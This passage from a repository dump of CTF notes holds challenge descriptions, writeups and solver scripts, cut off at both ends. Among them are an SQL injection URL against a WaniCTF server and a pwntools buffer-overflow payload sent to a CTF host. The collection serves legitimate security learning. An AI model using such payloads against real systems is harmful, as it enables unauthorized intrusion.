151 163 55 16🌑 15💜 1🌑5 55 1🌑🐴 1🌑5 163 16🌑 55 1🌑5 156 1🌑3 157 1🌑🌑 151 156 1🌑7 55 155 1🌑5 16🌑 15💜 157 1🌑🌑 175\n```\n\n残りは総当たりで絞り込んでいく。結果、下のように対応付けると綺麗に英単語が現れる。\n\n| number | emoji |\n| ------ | ----- |\n| 0 | 💜 |\n| 1 | ⭐ |\n| 2 | 🐴 |\n| 3 | 🍀 |\n| 4 | 🌑 |\n| 5 | 🦄 |\n| 6 | 🌈 |\n| 7 | 🎈 |\n\n* [CyberChef-Recipe](https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%92%9C'%7D,'0',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%E2%AD%90'%7D,'1',true,true,true,false)Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%90%B4'%7D,'2',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%8D%80'%7D,'3',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%8C%91'%7D,'4',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%A6%84'%7D,'5',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%8C%88'%7D,'6',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%F0%9F%8E%88'%7D,'7',true,false,true,false)From_Octal('Space')&input=4q2Q8J%2BMiPCfjYAg4q2Q8J%2BMiPCfpoQg4q2Q8J%2BmhPCfjIgg4q2Q8J%2BOiPCfjYAg4q2Q8J%2BmhPCfjJEg4q2Q8J%2BMiPCfpoQg4q2Q8J%2BMkfCfjYAg4q2Q8J%2BmhPCfjYAg4q2Q8J%2BOiOKtkCDwn6aE8J%2BmhCDirZDwn6aE8J%2BOiCDirZDwn4yR8J%2BNgCDirZDwn4yI8J%2BMkSDirZDwn4yR4q2QIOKtkPCfpoTwn4yRIPCfpoTwn6aEIOKtkPCfjJHwn6aEIOKtkPCfpoTwn4yIIOKtkPCfjJHwn42AIOKtkPCfpoTwn46IIOKtkPCfjJHwn4yRIOKtkPCfpoTirZAg4q2Q8J%2BmhPCfjIgg4q2Q8J%2BMkfCfjogg8J%2BmhPCfpoQg4q2Q8J%2BmhOKtkCDirZDwn4yI8J%2BNgCDwn6aE8J%2BmhCDirZDwn4yI8J%2BMkSDirZDwn6aE8J%2BSnCDirZDwn4yR8J%2BmhCDwn6aE8J%2BmhCDirZDwn4yR8J%2BQtCDirZDwn4yR8J%2BmhCDirZDwn4yI8J%2BNgCDirZDwn4yI8J%2BMkSDwn6aE8J%2BmhCDirZDwn4yR8J%2BmhCDirZDwn6aE8J%2BMiCDirZDwn4yR8J%2BNgCDirZDwn6aE8J%2BOiCDirZDwn4yR8J%2BMkSDirZDwn6aE4q2QIOKtkPCfpoTwn4yIIOKtkPCfjJHwn46IIPCfpoTwn6aEIOKtkPCfpoTwn6aEIOKtkPCfjJHwn6aEIOKtkPCfjIjwn4yRIOKtkPCfpoTwn5KcIOKtkPCfpoTwn46IIOKtkPCfjJHwn4yRIOKtkPCfjojwn6aE)\n\n<!-- sun{lucky-octal-encoding-is-the-best-encoding-method} -->" }, { "alpha_fraction": 0.7680412530899048, "alphanum_fraction": 0.8298969268798828, "avg_line_length": 20.66666603088379, "blob_id": "bc812ab0755cf2f4069c4605662535b665f73993", "content_id": 
"be8d7c9b28be1a163dd353bd748e4087cf27084e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 280, "license_type": "no_license", "max_line_length": 89, "num_lines": 9, "path": "/2020/WaniCTF/Find_a_Number/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "隠された数字を当てるとフラグが表示されます.\n\n数字は0以上500000以下であることが保証されています.\n\n`nc number.wanictf.org 60000`\n\n[number.py](https://score.wanictf.org/storage/vtealojurvdthppkuvwatojhkmloxdbo/number.py)\n\nWriter : kawamoto" }, { "alpha_fraction": 0.5479452013969421, "alphanum_fraction": 0.664383590221405, "avg_line_length": 13.600000381469727, "blob_id": "8266a9d14ae81cc6a56f1b747bb5744e24e9848a", "content_id": "d1618f09b684ec2048c061419cf17c0a161d0ea2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 186, "license_type": "no_license", "max_line_length": 44, "num_lines": 10, "path": "/2021/redpwnCTF_2021/compliant-lattice-feline/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nncコマンドを実行するとフラグが返ってくる。\n\n```bash\n$ nc mc.ax 31443\nflag{n3tc4t_1s_a_pip3_t0_the_w0rld}\n```\n\n<!-- flag{n3tc4t_1s_a_pip3_t0_the_w0rld} -->\n" }, { "alpha_fraction": 0.7531914710998535, "alphanum_fraction": 0.7765957713127136, "avg_line_length": 35.230770111083984, "blob_id": "982ddb4291b2304dfcf79f65a9d053527879b072", "content_id": "1ff96714d2bd624ddcadbf79c5b2476e985c571b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 470, "license_type": "no_license", "max_line_length": 214, "num_lines": 13, "path": "/2021/BCACTF_2.0/Movie-Login-3/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I think the final addition to the Gerard series is coming out! I heard the last few movies got their poster leaked. I'm pretty sure they've increased their security, though. Could you help me find the poster again?\n\n[denylist.json](https://objects.bcactf.com/bcactf2/movie-login-3/denylist.json)\n\nhttp://web.bcactf.com:49162/\n\nHint 1 of 2\n\nDoes there seem to be anything different about this problem?\n\nHint 2 of 2\n\nHow can you get around the new keywords being detected?" 
}, { "alpha_fraction": 0.5757575631141663, "alphanum_fraction": 0.6818181872367859, "avg_line_length": 18, "blob_id": "6738330e895dbfd835adcba7cfc322e0e99c216f", "content_id": "d5c018c9efb3ab16e9fd045aa9bf1df548a021e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 182, "license_type": "no_license", "max_line_length": 47, "num_lines": 7, "path": "/2020/WaniCTF/DevTools_2/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n直接HTMLのテキストを変更すると、フラグが`alert()`で表示される。\n\n![](img/2020-11-22-13-48-58.png)\n\n<!-- FLAG{you_can_edit_html_using_devtools} -->" }, { "alpha_fraction": 0.7520325183868408, "alphanum_fraction": 0.7682926654815674, "avg_line_length": 48.400001525878906, "blob_id": "87763a48290b3bfcfbd34e5c3f8632965a263161", "content_id": "57e3ac3ad8d953353e957d4dc0ab7e53b0032ffe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 246, "license_type": "no_license", "max_line_length": 184, "num_lines": 5, "path": "/2020/SunshineCTF/Password_Pandemonium/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "You're looking to book a flight to Florida with the totally-legit new budget airline, Oceanic Airlines! All you need to do is create an account! Should be pretty easy, right? ...right?\n\nhttp://pandemonium.web.2020.sunshinectf.org\n\nAuthor: Jeffrey D." }, { "alpha_fraction": 0.7609890103340149, "alphanum_fraction": 0.8104395866394043, "avg_line_length": 120.66666412353516, "blob_id": "853348828726cf3a44a0433f55da2c180e0549d0", "content_id": "b712a85e660cc06750fcb5aa566d44ebfa41164a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 368, "license_type": "no_license", "max_line_length": 268, "num_lines": 3, "path": "/2021/justCTF_2020/PDF_is_broken_and_so_is_this_file/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "This PDF contains the flag, but you’ll probably need to fix it first to figure out how it’s embedded. Fortunately, the file contains everything you need to render it. 
Follow the clues to find the flag, and hopefully learn something about the PDF format in the process.\n\nhttps://ams3.digitaloceanspaces.com/justctf/eccb3bff-69aa-4232-8087-a5e8eea0f581/challenge.pdf" }, { "alpha_fraction": 0.6720647811889648, "alphanum_fraction": 0.6983805894851685, "avg_line_length": 22.571428298950195, "blob_id": "5a4b5ed5740ff83d48366e83d0b8133261eabebd", "content_id": "b82c99705989e924223725c6a630ec1163081cad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 784, "license_type": "no_license", "max_line_length": 93, "num_lines": 21, "path": "/2020/WaniCTF/SQL_Challenge_2/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nSQLインジェクションをしてフラグを入手する。ただし、使えるクエリ文字列には制限がある。特殊記号の前に`\\`が付与される。\n\n```php\n//preg_replaceで危険な記号を処理する。\n$pattern = '/([^a-zA-Z0-9])/';\n$replace = '\\\\\\$0';\n$year = preg_replace($pattern, $replace, $year);\n\n//クエリを作成する。\n$query = \"SELECT * FROM anime WHERE years = $year\";\n```\n\nクエリパラメータに`years`を与える。すると、`SELECT * FROM anime WHERE years = years`が実行されてすべての`anime`カラムが取得できる。\n\n* https://sql2.wanictf.org/index.php?year=years\n\n<!-- FLAG{5ql_ch4r_cf_ca87b27723} -->\n\n(特殊文字を使うという固定観念に縛られて、思いのほか結構悩んだ。)" }, { "alpha_fraction": 0.7293233275413513, "alphanum_fraction": 0.7481203079223633, "avg_line_length": 19.461538314819336, "blob_id": "118c12ca8ba9603c072d14370538223f077e880d", "content_id": "a0145b5fcaccc7dfdc77abf170ee320ed0c9c892", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 266, "license_type": "no_license", "max_line_length": 69, "num_lines": 13, "path": "/2021/BCACTF_2.0/􃗁􌲔􇺟􊸉􁫞􄺷􄧻􃄏􊸉/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Here's some enciphered text. Find the flag.\n\nNote: The flag is all-lowercase.\n\n[ciphertext.md](https://objects.bcactf.com/bcactf2/pua/ciphertext.md)\n\nHint 1 of 2\n\nThe characters are all the same... 
or are they?\n\nHint 2 of 2\n\nHow many different characters are there?\n" }, { "alpha_fraction": 0.5625, "alphanum_fraction": 0.7013888955116272, "avg_line_length": 17, "blob_id": "58476307ba2a21360ecde5f8d7b45fbbe9aaded7", "content_id": "617cda33037904d5dc44538f310abe66ef154c54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 45, "num_lines": 8, "path": "/2021/ImaginaryCTF_2021/stackoverflow/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nio = remote('chal.imaginaryctf.org', '42001')\n\npayload = p32(0x69637466)\n\nio.sendline(b'\\x00'*40 + payload)\nio.interactive()\n" }, { "alpha_fraction": 0.36090224981307983, "alphanum_fraction": 0.6060150265693665, "avg_line_length": 30.66666603088379, "blob_id": "db58ef66cb9b022623dc2c94ee23561b8ae99f3d", "content_id": "957b45311e58a656805c624bad3de53893dd4d4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 665, "license_type": "no_license", "max_line_length": 246, "num_lines": 21, "path": "/2021/RaRCTF_2021/verybabyrev/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\nimport string\n\nCHARS = string.printable\n\nlocals = [0x45481d1217111313, 0x95f422c260b4145, 0x541b56563d6c5f0b, 0x585c0b3c2945415f, 0x402a6c54095d5f00, 0x4b5f4248276a0606, 0x6c5e5d432c2d4256, 0x6b315e434707412d, 0x5e54491c6e3b0a5a, 0x2828475e05342b1a, 0x60450073b26111f, 0xa774803050b0d04]\nlocals = [ long_to_bytes(l)[::-1] for l in locals]\n\nflag = 'r'\nidx = 0\n\nfor local in locals:\n for l in local:\n for c in CHARS:\n if ord(flag[idx]) ^ ord(c) == l:\n flag += c\n idx += 1\n if c == '}':\n print(flag)\n exit(0)\n break\n" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.7090908885002136, "avg_line_length": 36, "blob_id": "4d12fcf2ba270fe9a78730d97fa57e5b2e4edad9", "content_id": "b46b868536109ed0cc80b7a5e9bb4034b702251f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 110, "license_type": "no_license", "max_line_length": 91, "num_lines": 3, "path": "/2021/UIUCTF_2021/wasmbaby/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "wasm's a cool new technology! 
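What `p32()` in the stackoverflow solver above actually puts on the wire: the dword 0x69637466 ('ictf' read big-endian) laid out little-endian, so memory holds the bytes the comparison expects. A standard-library sketch:

```python
# struct.pack('<I', ...) is the plain-Python equivalent of pwntools p32().
import struct

payload = struct.pack('<I', 0x69637466)
print(payload)                               # b'ftci' on the wire
print(hex(struct.unpack('<I', payload)[0]))  # 0x69637466 once loaded as a dword
```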
[http://wasmbaby.chal.uiuc.tf](http://wasmbaby.chal.uiuc.tf/)\n\n**author**: ian5v" }, { "alpha_fraction": 0.313554972410202, "alphanum_fraction": 0.6429667472839355, "avg_line_length": 50.44736862182617, "blob_id": "88c34d362747741fbfaad30288867556e552aa07", "content_id": "341054f68ff0d6d27ca3c46105f5884b15ef7ae6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1955, "license_type": "no_license", "max_line_length": 621, "num_lines": 38, "path": "/2021/PlaidCTF_2021/xorsa/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Util.number import *\nfrom Crypto.Cipher import PKCS1_OAEP\n\npubKey = RSA.import_key(open(os.path.dirname(__file__) + \"/dist/public.pem\").read())\ne = pubKey.e\nn = pubKey.n\nx = 16158503035655503426113161923582139215996816729841729510388257123879913978158886398099119284865182008994209960822918533986492024494600106348146394391522057566608094710459034761239411826561975763233251722937911293380163746384471886598967490683174505277425790076708816190844068727460135370229854070720638780344789626637927699732624476246512446229279134683464388038627051524453190148083707025054101132463059634405171130015990728153311556498299145863647112326468089494225289395728401221863674961839497514512905495012562702779156196970731085339939466059770413224786385677222902726546438487688076765303358036256878804074494\n\nprimes = [[0,0]]\nbit = 1\nwhile bit <= 2**4096:\n next_primes = []\n for ps in primes:\n [p, q] = ps\n if p > q and [q, p] in primes:\n continue\n bit_mask = (bit << 1) - 1\n if (x & bit) == 0: # XOR : 0\n if ((p * q) & bit_mask) == (n & bit_mask) and p * q <= n: # 0,0\n next_primes.append([p, q])\n if ((p | bit) * (q | bit) & bit_mask) == (n & bit_mask) and (p | bit) * (q | bit) <= n: # 1,1\n next_primes.append([(p | bit), (q | bit)])\n else: # XOR : 1\n if (p * (q | bit) & bit_mask) == (n & bit_mask) and p * (q | bit) <= n: # 0,1\n next_primes.append([p, (q | bit)])\n if ((p | bit) * q & bit_mask) == (n & bit_mask) and (p | bit) * q <= n: # 1,0\n next_primes.append([(p | bit), q]) \n primes = next_primes\n bit <<= 1\n\nfor prime in primes:\n [p, q] = prime\n d = pow(e, -1, (p-1)*(q-1))\n key = RSA.construct((n,e,d,p,q))\n cipher = PKCS1_OAEP.new(key)\n print(cipher.decrypt(open(os.path.dirname(__file__) + \"/dist/flag.enc\", \"rb\").read()))\n" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.8146551847457886, "avg_line_length": 32.14285659790039, "blob_id": "a7eb04da0cc25f460b6bfc10db2ff1a0ce6f6e2f", "content_id": "64b158bb7cdfc203cd8576369e1a8e895ec3806f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 234, "license_type": "no_license", "max_line_length": 119, "num_lines": 7, "path": "/2021/redpwnCTF_2021/secure/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Just learned about encryption—now, my website is unhackable!\n\n[secure.mc.ax](https://secure.mc.ax/)\n\nDownloads\n\n[index.js](https://static.redpwn.net/uploads/210a9fe526e420576e4b6c1cb74eeed437c1a89955c8158c14aa365c45578200/index.js)\n" }, { "alpha_fraction": 0.6733668446540833, "alphanum_fraction": 0.7839195728302002, "avg_line_length": 38.79999923706055, "blob_id": "5ebf83227d29124b1e65fffc9a890c388adf4d65", "content_id": "42a543b123a404ff386ac191987e232187c2cd24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", 
"length_bytes": 199, "license_type": "no_license", "max_line_length": 101, "num_lines": 5, "path": "/2021/DawgCTF_2021/Secret_App/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I hid my flag in a secret app but I forgot what my username and password are.\n\nAuthor: Percival\n\n[secret_app.exe](https://umbccd.io/files/c2d007acae2a65263188375ae518422a/secret_app.exe?token=eyJ1c2VyX2lkIjoxMjg1LCJ0ZWFtX2lkIjo3MzgsImZpbGVfaWQiOjIyfQ.YJZJJQ.Q9G_MqlaRvpI6N4jdrZgRi7ye74)\n" }, { "alpha_fraction": 0.2586418092250824, "alphanum_fraction": 0.3037509322166443, "avg_line_length": 14.163568496704102, "blob_id": "4eeb9a226c2d55f135ba0d60516287518edea751", "content_id": "1f9834703d9097cfeefb31de8da34858af853631", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4269, "license_type": "no_license", "max_line_length": 383, "num_lines": 269, "path": "/2021/RaRCTF_2021/Dotty/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nexeファイルが与えられる。dnSpyでデコンパイルしたところ、次のようなコードが実行されていることが分かった。\n\n```cs\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\n\nnamespace Dotty\n{\n\t// Token: 0x02000002 RID: 2\n\tinternal class Program\n\t{\n\t\t// Token: 0x06000002 RID: 2 RVA: 0x00002058 File Offset: 0x00000258\n\t\tprivate static string Dotter(string phrase)\n\t\t{\n\t\t\treturn string.Join(\"|\", from char c in phrase\n\t\t\tselect Program.mapper[char.ToUpper(c)]);\n\t\t}\n\n\t\t// Token: 0x06000003 RID: 3 RVA: 0x0000208C File Offset: 0x0000028C\n\t\tprivate static void Main(string[] args)\n\t\t{\n\t\t\tConsole.Write(\"Please enter your secret to encode: \");\n\t\t\tstring phrase = Console.ReadLine();\n\t\t\tstring text = Program.Dotter(phrase);\n\t\t\tif (text == Check.check)\n\t\t\t{\n\t\t\t\tConsole.WriteLine(\"That's the right secret!\");\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tConsole.WriteLine(text);\n\t\t\t}\n\t\t}\n\n\t\t// Token: 0x04000001 RID: 1\n\t\tprivate static Dictionary<char, string> mapper = new Dictionary<char, string>\n\t\t{\n\t\t\t{\n\t\t\t\t' 
',\n\t\t\t\t\"/\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'A',\n\t\t\t\t\".-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'B',\n\t\t\t\t\"-...\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'C',\n\t\t\t\t\"-.-.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'D',\n\t\t\t\t\"-..\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'E',\n\t\t\t\t\".\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'F',\n\t\t\t\t\"..-.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'G',\n\t\t\t\t\"--.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'H',\n\t\t\t\t\"....\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'I',\n\t\t\t\t\"..\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'J',\n\t\t\t\t\".---\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'K',\n\t\t\t\t\"-.-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'L',\n\t\t\t\t\".-..\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'M',\n\t\t\t\t\"--\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'N',\n\t\t\t\t\"-.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'O',\n\t\t\t\t\"---\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'P',\n\t\t\t\t\".--.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'Q',\n\t\t\t\t\"--.-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'R',\n\t\t\t\t\".-.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'S',\n\t\t\t\t\"...\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'T',\n\t\t\t\t\"-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'U',\n\t\t\t\t\"..-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'V',\n\t\t\t\t\"...-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'W',\n\t\t\t\t\".--\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'X',\n\t\t\t\t\"-..-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'Y',\n\t\t\t\t\"-.--\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'Z',\n\t\t\t\t\"--..\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'1',\n\t\t\t\t\".----\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'2',\n\t\t\t\t\"..---\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'3',\n\t\t\t\t\"...--\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'4',\n\t\t\t\t\"....-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'5',\n\t\t\t\t\".....\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'6',\n\t\t\t\t\"-....\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'7',\n\t\t\t\t\"--...\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'8',\n\t\t\t\t\"---..\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'9',\n\t\t\t\t\"----.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'0',\n\t\t\t\t\"-----\"\n\t\t\t}\n\t\t};\n\t}\n}\n\nnamespace Dotty\n{\n\t// Token: 0x02000003 RID: 3\n\tinternal class Check\n\t{\n\t\t// Token: 0x04000003 RID: 3\n\t\tpublic static string check = \"-|....|.|/|..-.|.-..|.-|--.|/|..|...|/|---|.---|--.-|-..-|.|-.--|...--|..-|--|--..|.....|.--|..|--|.-..|.|.-..|.....|....-|-|.-|.....|-.-|--...|---|.-|--..|-|--.|..---|..---|--...|--.|-...|--..|..-.|-....|-.|.-..|--.-|.--.|.|--...|-|-....|.--.|--..|--...|.-..|.....|-|--.|-.-.|-.|-..|-...|--|--|...--|-..|.-|-.|.-..|.....|/|-...|.-|...|.|...--|..---\";\n\t}\n}\n```\n\n`check`を`mapper`から元に戻したところ、\n\n```\nTHE FLAG IS OJQXEY3UMZ5WIMLEL54TA5K7OAZTG227GBZF6NLQPE7T6PZ7L5TGCNDBMM3DANL5 BASE32\n```\n\nというメッセージが得られた。指示通りBase32デコードすると、フラグが得られた。\n\n```py\nimport base64\n\ncheck = \"-|....|.|/|..-.|.-..|.-|--.|/|..|...|/|---|.---|--.-|-..-|.|-.--|...--|..-|--|--..|.....|.--|..|--|.-..|.|.-..|.....|....-|-|.-|.....|-.-|--...|---|.-|--..|-|--.|..---|..---|--...|--.|-...|--..|..-.|-....|-.|.-..|--.-|.--.|.|--...|-|-....|.--.|--..|--...|.-..|.....|-|--.|-.-.|-.|-..|-...|--|--|...--|-..|.-|-.|.-..|.....|/|-...|.-|...|.|...--|..---\"\n\nd = { \n ' ': \"/\" ,\n\t\t'A': \".-\" ,\n\t\t'B': \"-...\" ,\n\t\t'C': \"-.-.\" ,\n\t\t'D': \"-..\" ,\n\t\t'E': \".\" ,\n\t\t'F': \"..-.\" ,\n\t\t'G': \"--.\" ,\n\t\t'H': \"....\" ,\n\t\t'I': \"..\" ,\n\t\t'J': \".---\" ,\n\t\t'K': \"-.-\" ,\n\t\t'L': \".-..\" ,\n\t\t'M': \"--\" ,\n\t\t'N': \"-.\" ,\n\t\t'O': \"---\" ,\n\t\t'P': \".--.\" ,\n\t\t'Q': \"--.-\" ,\n\t\t'R': \".-.\" ,\n\t\t'S': \"...\" ,\n\t\t'T': \"-\" ,\n\t\t'U': \"..-\" ,\n\t\t'V': \"...-\" ,\n\t\t'W': \".--\" ,\n\t\t'X': \"-..-\" ,\n\t\t'Y': \"-.--\" ,\n\t\t'Z': \"--..\" ,\n\t\t'1': \".----\" ,\n\t\t'2': \"..---\" ,\n\t\t'3': 
\"...--\" ,\n\t\t'4': \"....-\" ,\n\t\t'5': \".....\" ,\n\t\t'6': \"-....\" ,\n\t\t'7': \"--...\" ,\n\t\t'8': \"---..\" ,\n\t\t'9': \"----.\" ,\n\t\t'0': \"-----\"\n }\n\nd_swap = {v: k for k, v in d.items()}\n\nmsg = ''\nfor c in check.split('|'):\n msg += d_swap[c]\nprint(msg)\n# THE FLAG IS OJQXEY3UMZ5WIMLEL54TA5K7OAZTG227GBZF6NLQPE7T6PZ7L5TGCNDBMM3DANL5 BASE32\n\nflag = base64.b32decode('OJQXEY3UMZ5WIMLEL54TA5K7OAZTG227GBZF6NLQPE7T6PZ7L5TGCNDBMM3DANL5')\nprint(flag)\n```\n\n<!-- rarctf{d1d_y0u_p33k_0r_5py????_fa4ac605} -->\n" }, { "alpha_fraction": 0.6342412233352661, "alphanum_fraction": 0.8054474592208862, "avg_line_length": 50.599998474121094, "blob_id": "0ee23e5c3bfff7b3b9e6ca3c46e057c893716ee8", "content_id": "68ee670503da65e12d9797f67f4ad53163a6e3b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 257, "license_type": "no_license", "max_line_length": 122, "num_lines": 5, "path": "/2021/angstromCTF_2021/Keysar_v2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Wow! Aplet sent me a message... he said he encrypted it with a key, but lost it. Gotta go though, I have biology homework!\n\n[Source Output](https://files.actf.co/8125825ae0a5c81fe0f3e4520b95c02937a4d6624929afec84e451366ede6552/out.txt)\n\nAuthor: EvilMuffinHa" }, { "alpha_fraction": 0.75789475440979, "alphanum_fraction": 0.7789473533630371, "avg_line_length": 25, "blob_id": "c2a297956cecde818c30d18e378cf25c2315d7e5", "content_id": "808c93f005b91d8823392384ab7e7fb94c73b8b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 285, "license_type": "no_license", "max_line_length": 81, "num_lines": 11, "path": "/2021/BCACTF_2.0/Its_All_Coming_Together/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Hey, someone wrote all these numbers on my computer! Can you check them out?\n\n[numbers.txt](https://objects.bcactf.com/bcactf2/continuedfractions1/numbers.txt)\n\nHint 1 of 2\n\nThey left a note! It says something about division?\n\nHint 2 of 2\n\nRemember to compensate for loss of precision." 
}, { "alpha_fraction": 0.5841924548149109, "alphanum_fraction": 0.6048110127449036, "avg_line_length": 18.46666717529297, "blob_id": "125dee34214c80cc83ca38bdba30a3edbc3d3444", "content_id": "a0130abad1ccd95f892df1925e8b80235ae78cd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 291, "license_type": "no_license", "max_line_length": 74, "num_lines": 15, "path": "/2021/WaniCTF21-spring/Git_Master/docker-log.sh", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nDOCKER=`which docker`\n\nif [ \"$#\" -ne 1 ]; then\n echo \"Usage: $0 IMAGE\"\n exit 0\nfi\n\nfor commit in $($DOCKER history $1 | sed 1d | awk '{ print $1 }')\ndo\n content=\"$commit\n$($DOCKER inspect $commit | tr -d '\\\"' | grep 'Created\\|Author\\|Comment')\"\n echo \"$content\"\ndone" }, { "alpha_fraction": 0.7094017267227173, "alphanum_fraction": 0.8034188151359558, "avg_line_length": 22.600000381469727, "blob_id": "3847e312f574b726dabb88400fa97e14fa856386", "content_id": "30f70fd196772e0ff153e6dd2544149f8ea3bc33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 125, "license_type": "no_license", "max_line_length": 95, "num_lines": 5, "path": "/2021/WaniCTF21-spring/Easy/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "手始めに\n\n[cry-easy.zip](https://score.wanictf.org/storage/wps7tq2o7b538vemzgkjrp59e78pism0/cry-easy.zip)\n\nWriter : Laika" }, { "alpha_fraction": 0.6800000071525574, "alphanum_fraction": 0.6933333277702332, "avg_line_length": 12.727272987365723, "blob_id": "3b945178b9b66992ebdddda0556148d6c916cc0b", "content_id": "2363c909433742e52428420a6acee106ce8c5c51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 208, "license_type": "no_license", "max_line_length": 50, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Chicken_Caesar_Salad/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のテキストが与えられる。\n\n```\nqkbn{ePmv_lQL_kIMamZ_kQxpMZa_oMb_aW_pIZl}\n```\n\nROT18したところ、フラグが得られた。\n\n<!-- ictf{wHen_dID_cAEseR_cIphERs_gEt_sO_hARd} -->" }, { "alpha_fraction": 0.740185558795929, "alphanum_fraction": 0.794432520866394, "avg_line_length": 38.94285583496094, "blob_id": "446ee2c2246d3220fa36c05d0db613131f2fee7c", "content_id": "2c0d4db9c0fb36bfdaa3f7635947d506344ddc9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2159, "license_type": "no_license", "max_line_length": 401, "num_lines": 35, 